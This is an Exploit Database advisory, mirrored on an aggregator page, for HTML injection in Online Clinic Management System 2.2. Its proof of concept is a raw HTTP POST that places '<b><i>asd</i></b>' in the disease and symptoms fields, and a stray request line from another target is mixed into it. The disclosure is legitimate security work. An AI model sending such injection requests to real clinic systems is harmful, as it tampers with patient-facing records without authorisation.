Online Clinic Management System 2.2 – HTML Injection

• Exploit Database
• 113 阅读

• 作者： Cemal Cihad ÇİFTÇİ
  日期： 2019-12-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47741/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85

  # Exploit Title: Online Clinic Management System 2.2 - HTML Injection # Date: 2019-11-29 # Exploit Author: Cemal Cihad ÇİFTÇİ # Vendor Homepage: https://bigprof.com # Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system # Software : Online Clinic Management System # Version : 2.2 # Vulernability Type : HTML Injection # Vulenrability : HTM Injection   # HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini # add disase symptom, patient and appointment section. # payload: <b><i>asd</i></b>   # HTTP POST request   POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1 Host: 10.10.10.160 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 POST /clinic/disease_symptoms_view.php HTTP/1.1 Host: 10.10.10.160 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------325041947016922 Content-Length: 1501 Origin: http://10.10.10.160 Connection: close Referer: http://10.10.10.160/clinic/disease_symptoms_view.php Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8 Upgrade-Insecure-Requests: 1   -----------------------------325041947016922 Content-Disposition: form-data; name="current_view"   DV -----------------------------325041947016922   Content-Disposition: form-data; name="SortField" -----------------------------325041947016922 Content-Disposition: form-data; name="SelectedID"   1 -----------------------------325041947016922 Content-Disposition: form-data; name="SelectedField"   -----------------------------325041947016922 Content-Disposition: form-data; name="SortDirection"   -----------------------------325041947016922 Content-Disposition: form-data; name="FirstRecord"   1 -----------------------------325041947016922 Content-Disposition: form-data; name="NoDV"   -----------------------------325041947016922 Content-Disposition: form-data; name="PrintDV"   -----------------------------325041947016922 Content-Disposition: form-data; name="DisplayRecords"   all -----------------------------325041947016922 Content-Disposition: form-data; name="disease"   <b><i>asd</i></b>   -----------------------------325041947016922 Content-Disposition: form-data; name="symptoms"   <b><i>asd</i></b>   -----------------------------325041947016922 Content-Disposition: form-data; name="reference"   -----------------------------325041947016922 Content-Disposition: form-data; name="update_x"   1 -----------------------------325041947016922 Content-Disposition: form-data; name="SearchString" -----------------------------325041947016922--